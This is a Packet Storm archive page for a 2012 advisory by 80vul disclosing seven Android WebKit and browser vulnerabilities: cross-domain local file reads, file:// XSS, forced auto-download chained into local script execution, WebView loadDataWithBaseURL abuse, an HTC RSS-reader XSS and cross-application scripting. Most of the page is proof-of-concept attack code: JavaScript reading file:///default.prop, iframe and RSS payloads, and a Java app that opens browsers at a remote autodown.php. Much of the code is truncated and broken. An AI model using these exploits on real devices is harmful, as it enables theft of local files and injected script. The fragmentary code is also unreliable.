what you don't know can hurt you

Android Webkit XSS / Cross Domain Issues

Android Webkit XSS / Cross Domain Issues
Posted Feb 8, 2012
Authored by 80vul | Site 80vul.com

Android suffers from multiple cross site scripting, cross domain, auto file download and cross protocol vulnerabilities.

tags | exploit, vulnerability, protocol, xss
MD5 | a5188b0eff042c2832d8d4466813b51c

Android Webkit XSS / Cross Domain Issues

Change Mirror Download
Android  Multiple  Vulnerabilities

Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2012/2/8
References: http://www.80vul.com/android/android-0days.txt

Ph4nt0m Webzine 0x06 has been
three papers on the android application security about the development
environment,browser security, inter-application communication.And published
a lot of 0days:

[0day-NO.0] android-webkit local cross-domain vulnerability

android-webkit allow local html files cross any http domain and the local

var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP',
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}


//xmlhttp.open("GET", "file://///default.prop", false);
//xmlhttp.open("GET", "http://www.80vul.com/", false);
var ret = xmlhttp.responseText;


[0day-NO.1] android-webkit cross-protocol vulnerability

this vul allow cross to the file protocol from http. demo:

<iframe name=f src="location.php" ></iframe>
function init(){
f.location = "file:///default.prop";

location.php codz:

[0day-NO.2] android-webkit file:// protocol xss vulnerability

ON android-webkit File:// protocol, the lack of filtering on the directory
and file name,Lead to cross-site scripting attacks. demo:

visit this : file:///80vul.com/<script>alert(1);</script>

[0day-NO.3] android-browser/firefox auto download the file vulnerability

android-browser/firefox Handle the Content-Disposition: attachment, lack of
safety tips.So through this vul allows users to automatically download the
evil html file to the local directory.

test this code:

header("Content-Disposition: attachment:filename=autodown.htm");
print $data;

the local file name and the path:

android 1.x --> /sdcard/download/autodown.html
android 2.x-3.x --> /sdcard/download/autodown.htm
android 4.0 --> /sdcard/download/autodown.php
firefox --> /sdcard/download/autodown.php

So,Let's play a jigsaw puzzle:

<iframe name=f src="location.php" ></iframe>
function init(){
f.location = "file:///ssss<sc"+"ript>alert(1);</sc"+"ript>/";

<meta http-equiv="refresh" content="0;URL=autodown.php"/>
<iframe name=f src="location.php" ></iframe>
function init(){
f.location = "file:///sdcard/Download/autodown.htm";

Now ,We can execute arbitrary js code on the local domain, and we can cross
any http domain and the local file used [0day-NO.0].

and go on ...

[0day-NO.4] webview.loadDataWithBaseURL() cross-protocol vulnerability

By controlling the second argument of webview.loadDataWithBaseURL(),can
cross the file:// protocol use javascript,like
<script>window.location='file://///default.prop';</script> .so the dome apk

WebView webview;
webview = (WebView) findViewById(R.id.webview);
webview.setWebChromeClient(new WebChromeClient());
webview.loadDataWithBaseURL("http://www.baidu.com/", data,
"text/html", "utf-8", null);

[0day-NO.5] com.htc.googlereader XSS vulnerability

com.htc.googlereader is an app on HTC Mobile [G10], there is a xss vul on
this app, then Decompilation and Found this codz:

label399: String str = this.mHeadlineShown.getSummary();
if (str.trim().contains("<iframe"))
this.mWebView.loadData(str, "text/html", "utf-8");
break label246;
this.mWebView.loadDataWithBaseURL("http://", str, "text/html",
"utf-8", null);
break label246;

the "str" have no filter and can be controlled by evil RSS:

<description><![CDATA[aa<script src='
<pubDate>Sun, 04 Sep 2011 13:01:40 -0500</pubDate>

When opens the unread status of the rss, u can get the XSS vul. and this
is mWebView.loadDataWithBaseURL(),so can cross file:// by [0day-NO.4].

[0day-NO.6] Some Browsers for android Cross-Application Scripting

the evil app can cross browser and execute arbitrary js code on the local
domain. the demo app codz:

//codz base on http://blog.watchfire.com/files/advisory-android-browser.pdf
package com.x;
//com.opera.browser com.opera.Opera

//org.mozilla.firefox org.mozilla.firefox.App

//com.android.browser com.android.browser.BrowserActivity

import android.app.Activity;
import android.content.ComponentName;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;

public class TesttestActivity extends Activity {
static final String mPackage = "com.android.browser";
static final String mClass = "com.android.browser.BrowserActivity";
static final String gomPackage = "com.opera.browser";
static final String gomClass = "com.opera.Opera";
static final String mUrl = "http://www.80vul.com/autodown.php";
static final int mSleep = 15000;
public void onCreate(Bundle savedInstanceState) {
try {
catch (InterruptedException e) {}
private void startBrowserActivity(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(mPackage,mClass));
private void startBrowserActivitygo(String url) {
Intent res = new Intent("android.intent.action.VIEW");
res.setComponent(new ComponentName(gomPackage,gomClass));



RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    1 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2019 Packet Storm. All rights reserved.

Security Services
Hosting By